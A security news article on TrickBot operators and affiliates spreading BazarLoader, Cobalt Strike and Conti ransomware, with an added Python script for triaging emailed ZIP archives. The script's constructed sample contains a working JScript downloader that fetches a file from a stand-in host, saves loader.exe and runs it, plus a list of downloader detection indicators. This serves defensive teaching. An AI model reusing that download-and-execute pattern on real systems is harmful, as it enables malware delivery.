The operators of the TrickBot malware have resurfaced with new tricks, seeking to increase its foothold by expanding its distribution channels, ultimately leading to the deployment of ransomware such as Conti.
The threat actor, tracked as Wizard Spider (and as ITG23 by IBM), has been found to be partnering with other cybercrime gangs tracked as Hive0105, Hive0106 and Hive0107, adding to the growing number of campaigns the attackers rely on to deliver their proprietary malware, according to a report by IBM X-Force.
Researchers stated that these cybercrime affiliates are infecting corporate networks with malware by hijacking email threads, using fake customer response forms, and social engineering employees through a fake call center known as BazaCall.
Since emerging on the threat landscape in 2016, TrickBot has evolved from a banking trojan into a modular Windows-based crimeware platform. It also stands out for its resilience: it has maintained and updated its toolset and infrastructure despite multiple efforts by law enforcement and industry groups to take it down. Besides TrickBot, the Wizard Spider group is credited with developing BazarLoader and a backdoor called Anchor.
Where earlier attacks this year relied on email campaigns delivering Excel documents and the call center ruse dubbed "BazaCall" to deliver malware to corporate users, more recent intrusions, beginning around June 2021, have been marked by a partnership with two cybercrime affiliates that augment its distribution infrastructure by leveraging hijacked email threads and fraudulent customer inquiry forms on organization websites to deploy Cobalt Strike payloads.
“This move not only increased the volume of its delivery attempts but also diversified delivery methods with the goal of infecting more potential victims than ever,” the researchers said.
In one infection chain observed by IBM in late August 2021, the Hive0107 affiliate is said to have adopted a new tactic: sending email messages to target companies claiming that their websites have been performing distributed denial-of-service (DDoS) attacks against the sender's servers, and urging the recipients to click a link for additional evidence. Once clicked, the link instead downloads a ZIP archive containing a malicious JavaScript (JS) downloader that, in turn, contacts a remote URL to fetch the BazarLoader malware, which then drops Cobalt Strike and TrickBot.
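The lure above ends in a ZIP archive carrying a Windows Script Host downloader, which is a shape that is easy to triage before anyone double-clicks it. The following Python snippet is an added example, not code from the article or from IBM X-Force: it unpacks an emailed ZIP in memory, flags any member with a script extension that Windows would hand to wscript.exe, looks inside that member for the COM objects a WSH downloader typically uses (XMLHTTP to fetch, ADODB.Stream to write to disk, WScript.Shell to execute), and extracts the remote URLs it would contact. The sample archive, its file names, its indicator list and the evidence.example.com URL are all constructed for illustration and are not indicators from the campaign.

```python
import io
import re
import zipfile

# Extensions Windows hands to the Windows Script Host (or mshta) on double-click.
SCRIPT_EXTENSIONS = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta")

# COM objects and functions commonly used by WSH downloaders to fetch, drop and run a payload.
# Illustrative list for this example, not a published IOC set.
DOWNLOADER_INDICATORS = (
    "MSXML2.XMLHTTP", "Microsoft.XMLHTTP", "WinHttp.WinHttpRequest",
    "ADODB.Stream", "WScript.Shell", "Shell.Application", "eval(", "unescape(",
)

URL_RE = re.compile(rb"https?://[^\s'\"<>]+", re.IGNORECASE)


def triage_zip(zip_bytes: bytes) -> dict:
    """Report whether an emailed ZIP matches the JS-downloader lure: a script member,
    downloader-style COM objects inside it, and the remote URLs it would contact."""
    report = {"script_members": [], "indicators": [], "urls": [], "suspicious": False}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            # Case-insensitive match also catches double extensions such as 'report.pdf.JS'.
            if not name.lower().endswith(SCRIPT_EXTENSIONS):
                continue
            report["script_members"].append(name)
            # Cap the read so a decompression-bomb member cannot exhaust memory during triage.
            content = zf.open(info).read(1_000_000)
            text = content.decode("latin-1")  # lossless for arbitrary bytes
            for ind in DOWNLOADER_INDICATORS:
                if ind.lower() in text.lower() and ind not in report["indicators"]:
                    report["indicators"].append(ind)
            for url in URL_RE.findall(content):
                u = url.decode("latin-1")
                if u not in report["urls"]:
                    report["urls"].append(u)
    # A script in an emailed ZIP is already odd; one that fetches or executes something is the lure.
    report["suspicious"] = bool(report["script_members"]) and bool(report["indicators"] or report["urls"])
    return report


def build_sample_zip(include_script: bool = True) -> bytes:
    """Constructed sample archive (not a real specimen). With include_script=True it
    contains a JS file mimicking the downloader pattern; otherwise only a text file."""
    js = (
        'var x = new ActiveXObject("MSXML2.XMLHTTP");\n'
        'x.open("GET", "http://evidence.example.com/ddos_proof.php?id=1", false);\n'
        'x.send();\n'
        'var s = new ActiveXObject("ADODB.Stream");\n'
        's.Type = 1; s.Open(); s.Write(x.responseBody);\n'
        's.SaveToFile("C:\\\\Users\\\\Public\\\\loader.exe", 2);\n'
        'new ActiveXObject("WScript.Shell").Run("C:\\\\Users\\\\Public\\\\loader.exe");\n'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("readme.txt", "See attached report.")
        if include_script:
            zf.writestr("DDoS_Evidence_Report.js", js)
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_zip(build_sample_zip()))
    print(triage_zip(build_sample_zip(include_script=False)))
```

The extracted URL is the part worth acting on: it is the first-stage download location, so it can be blocked at the proxy and searched for in web logs to find anyone who already clicked, before looking for the BazarLoader, Cobalt Strike and TrickBot follow-on stages.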
“ITG23 has also adapted to the ransomware economy through the creation of the Conti ransomware-as-a-service (RaaS) and the use of its BazarLoader and Trickbot payloads to gain a foothold for ransomware attacks,” the researchers concluded. “This latest development demonstrates the strength of its connections within the cybercriminal ecosystem and its ability to leverage these relationships to expand the number of organizations infected with its malware.”